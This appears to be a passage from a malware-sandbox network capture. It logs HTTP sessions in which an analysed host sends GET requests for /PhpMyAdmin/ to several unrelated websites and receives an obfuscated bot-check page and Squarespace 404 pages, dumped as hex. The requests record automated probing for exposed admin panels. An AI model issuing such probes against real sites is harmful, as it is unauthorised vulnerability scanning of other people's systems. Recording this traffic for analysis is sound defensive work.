2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b Data Ascii: 5ad<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[])+(+!+[]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![])), east=+((+!+[]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+
Feb 21, 2024 00:26:10.900171041 CET	514	IN	Data Raw: 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b Data Ascii: !![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEvent
Feb 21, 2024 00:26:10.900227070 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
202	192.168.2.6	58791	198.185.159.145	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.631552935 CET	175	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: publichouse.ie Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.724739075 CET	1276	IN	HTTP/1.1 404 Not Found Cache-Control: no-cache, must-revalidate Content-Length: 77562 Content-Type: text/html; charset=UTF-8 Date: Tue, 20 Feb 2024 23:26:10 UTC Expires: Thu, 01 Jan 1970 00:00:00 UTC Pragma: no-cache Server: Squarespace X-Contextid: jw5xpYID/ZjeADirw Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 Data Ascii: <!DOCTYPE html><head> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em; font-weight: 300; c
Feb 21, 2024 00:26:10.724782944 CET	1276	IN	Data Raw: 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 Data Ascii: olor: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family: 'Clarkson'; font-
Feb 21, 2024 00:26:10.724807024 CET	1276	IN	Data Raw: 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34 31 75 6f 5a 46 46 49 77 58 30 76 79 48 75 45 6a 48 59 48 32 56 6d 72 Data Ascii: LWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMttrEh8jq70i9RKy000O7s/J2
Feb 21, 2024 00:26:10.724864960 CET	268	IN	Data Raw: 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75 59 51 4c 64 5a 47 75 47 6a 75 6d 36 37 4f 36 76 73 34 70 7a 6e 4e 4e Data Ascii: xqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+rKdvVh6f1F0Y/zD8P1sa53N
Feb 21, 2024 00:26:10.724920034 CET	1276	IN	Data Raw: 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a 6d 6b 31 33 69 51 68 5a 70 56 76 77 57 61 65 4a 4a 76 5a 77 6d 5a 66 Data Ascii: 4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS5yocFv2WSejEdfhwp5nBV/y
Feb 21, 2024 00:26:10.724951029 CET	1276	IN	Data Raw: 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a 31 4b 74 35 6c 47 73 76 61 68 79 6a 4d 75 52 56 48 49 4e 4b 49 41 53 Data Ascii: b3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFIiJPGPnKHYK2JjCRhQbe7Dxt
Feb 21, 2024 00:26:10.724977970 CET	1276	IN	Data Raw: 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77 2f 4d 30 39 6b 66 67 47 63 66 7a 42 4f 77 72 79 52 61 56 44 73 36 44 Data Ascii: JIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2uE5F6+znJOlnPHleN2O10143
Feb 21, 2024 00:26:10.725028038 CET	1276	IN	Data Raw: 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79 78 47 4f 70 71 4a 4c 78 51 45 50 50 38 65 62 6b 68 32 78 6a 78 50 73 Data Ascii: ZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3jzHBrGuPR1YpMFFrB1bJ8us
Feb 21, 2024 00:26:10.725047112 CET	1276	IN	Data Raw: 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53 6d 38 78 79 37 34 61 37 52 49 71 32 52 79 68 4c 4c 71 34 76 45 4e 78 Data Ascii: KKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOYMOd3ZMy3lBovUZqA+G9Ip1V
Feb 21, 2024 00:26:10.725117922 CET	1276	IN	Data Raw: 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73 59 57 74 62 4f 4d 45 64 72 4b 62 50 65 78 6c 48 77 64 34 48 69 2f 67 Data Ascii: W9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBWNubh73czs77OmucVf3h6/Pn
Feb 21, 2024 00:26:10.815591097 CET	1276	IN	Data Raw: 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37 59 36 63 35 53 4e 6e 32 63 68 5a 4c 72 37 35 4d 79 53 4d 55 44 65 44 Data Ascii: /qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMfwYCj9K4ceU8KMt/MiGH+nwo

Session ID	Source IP	Source Port	Destination IP	Destination Port
203	192.168.2.6	58792	198.185.159.145	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.632080078 CET	173	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: mwpmedia.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.726180077 CET	1276	IN	HTTP/1.1 404 Not Found Cache-Control: no-cache, must-revalidate Content-Length: 77562 Content-Type: text/html; charset=UTF-8 Date: Tue, 20 Feb 2024 23:26:10 UTC Expires: Thu, 01 Jan 1970 00:00:00 UTC Pragma: no-cache Server: Squarespace X-Contextid: pPaKEUtW/rKMDspae Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 Data Ascii: <!DOCTYPE html><head> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em; font-weight: 300; c
Feb 21, 2024 00:26:10.726224899 CET	1276	IN	Data Raw: 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 Data Ascii: olor: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family: 'Clarkson'; font-
Feb 21, 2024 00:26:10.726260900 CET	1276	IN	Data Raw: 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34 31 75 6f 5a 46 46 49 77 58 30 76 79 48 75 45 6a 48 59 48 32 56 6d 72 Data Ascii: LWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMttrEh8jq70i9RKy000O7s/J2
Feb 21, 2024 00:26:10.726268053 CET	268	IN	Data Raw: 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75 59 51 4c 64 5a 47 75 47 6a 75 6d 36 37 4f 36 76 73 34 70 7a 6e 4e 4e Data Ascii: xqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+rKdvVh6f1F0Y/zD8P1sa53N
Feb 21, 2024 00:26:10.726275921 CET	1276	IN	Data Raw: 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a 6d 6b 31 33 69 51 68 5a 70 56 76 77 57 61 65 4a 4a 76 5a 77 6d 5a 66 Data Ascii: 4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS5yocFv2WSejEdfhwp5nBV/y
Feb 21, 2024 00:26:10.726319075 CET	1276	IN	Data Raw: 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a 31 4b 74 35 6c 47 73 76 61 68 79 6a 4d 75 52 56 48 49 4e 4b 49 41 53 Data Ascii: b3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFIiJPGPnKHYK2JjCRhQbe7Dxt
Feb 21, 2024 00:26:10.726366997 CET	1276	IN	Data Raw: 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77 2f 4d 30 39 6b 66 67 47 63 66 7a 42 4f 77 72 79 52 61 56 44 73 36 44 Data Ascii: JIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2uE5F6+znJOlnPHleN2O10143
